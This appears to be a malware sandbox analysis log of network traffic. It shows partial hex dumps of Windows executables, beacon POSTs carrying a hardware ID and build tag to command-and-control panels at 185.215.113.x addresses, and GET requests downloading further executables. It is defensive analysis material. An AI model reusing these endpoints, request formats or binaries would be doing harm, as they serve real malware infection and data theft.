00 00 00 05 00 01 00 00 00 00 00 00 d0 2e 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 ab 02 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 2e 00 ec 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8a cf 01 00 00 10 00 00 00 d0 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 08 d1 00 00 00 e0 01 00 00 d2 00 00 00 d4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c bd 2b 00 00 c0 02 00 00 9e 0a 00 00 a6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 3e 4b 00 00 00 80 2e 00 00 4c 00 00 00 44 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 04:25:43 GMTContent-Type: application/octet-streamContent-Length: 1883648Last-Modified: Wed, 30 Oct 2024 04:13:06 GMTConnection: keep-aliveETag: "6721b252-1cbe00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 90 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 4a 00 00 04 00 00 20 f0 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 72 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c4 71 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 71 64 64 65 7a 74 67 00 b0 19 00 00 d0 30 00 00 a4 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 7a 65 6c 72 63 79 76 00 10 00 00 00 80 4a 00 00 04 00 00 00 98 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 4a 00 00 22 00 00 00 9c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 04:25:54 GMTContent-Type: application/octet-streamContent-Length: 2899456Last-Modified: Wed, 30 Oct 2024 03:12:16 GMTConnection: keep-aliveETag: "6721a410-2c3e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2c 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2c 00 00 04 00 00 f0 41 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6d 6c 6a 72 69 61 70 70 00 e0 2b 00 00 a0 00 00 00 de 2b 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 75 64 74 61 76 67 74 00 20 00 00 00 80 2c 00 00 04 00 00 00 18 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2c 00 00 22 00 00 00 1c 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 04:26:02 GMTContent-Type: application/octet-streamContent-Length: 1883648Last-Modified: Wed, 30 Oct 2024 04:13:06 GMTConnection: keep-aliveETag: "6721b252-1cbe00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 90 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 4a 00 00 04 00 00 20 f0 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 72 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c4 71 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 71 64 64 65 7a 74 67 00 b0 19 00 00 d0 30 00 00 a4 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 7a 65 6c 72 63 79 76 00 10 00 00 00 80 4a 00 00 04 00 00 00 98 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 4a 00 00 22 00 00 00 9c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 04:26:20 GMTContent-Type: application/octet-streamContent-Length: 2899456Last-Modified: Wed, 30 Oct 2024 03:12:16 GMTConnection: keep-aliveETag: "6721a410-2c3e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2c 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2c 00 00 04 00 00 f0 41 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6d 6c 6a 72 69 61 70 70 00 e0 2b 00 00 a0 00 00 00 de 2b 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 75 64 74 61 76 67 74 00 20 00 00 00 80 2c 00 00 04 00 00 00 18 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2c 00 00 22 00 00 00 1c 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 04:26:22 GMTContent-Type: application/octet-streamContent-Length: 1883648Last-Modified: Wed, 30 Oct 2024 04:13:06 GMTConnection: keep-aliveETag: "6721b252-1cbe00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 90 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 4a 00 00 04 00 00 20 f0 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 72 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c4 71 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 71 64 64 65 7a 74 67 00 b0 19 00 00 d0 30 00 00 a4 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 7a 65 6c 72 63 79 76 00 10 00 00 00 80 4a 00 00 04 00 00 00 98 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 4a 00 00 22 00 00 00 9c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 32 35 33 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1002535001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 32 35 33 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1002536001&unit=246122658369
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDHCFCBGIDGHJJKJJDGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 48 43 46 43 42 47 49 44 47 48 4a 4a 4b 4a 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 30 45 38 39 38 41 35 31 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 48 43 46 43 42 47 49 44 47 48 4a 4a 4b 4a 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 48 43 46 43 42 47 49 44 47 48 4a 4a 4b 4a 4a 44 47 2d 2d 0d 0a Data Ascii: ------HJDHCFCBGIDGHJJKJJDGContent-Disposition: form-data; name="hwid"3D0E898A519D1524750037------HJDHCFCBGIDGHJJKJJDGContent-Disposition: form-data; name="build"tale------HJDHCFCBGIDGHJJKJJDG--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 32 35 33 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1002537001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEGHJKJKKJDHIDHJKJDHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 30 45 38 39 38 41 35 31 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 2d 2d 0d 0a Data Ascii: ------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="hwid"3D0E898A519D1524750037------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="build"tale------AAEGHJKJKKJDHIDHJKJD--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 32 35 33 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1002538001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
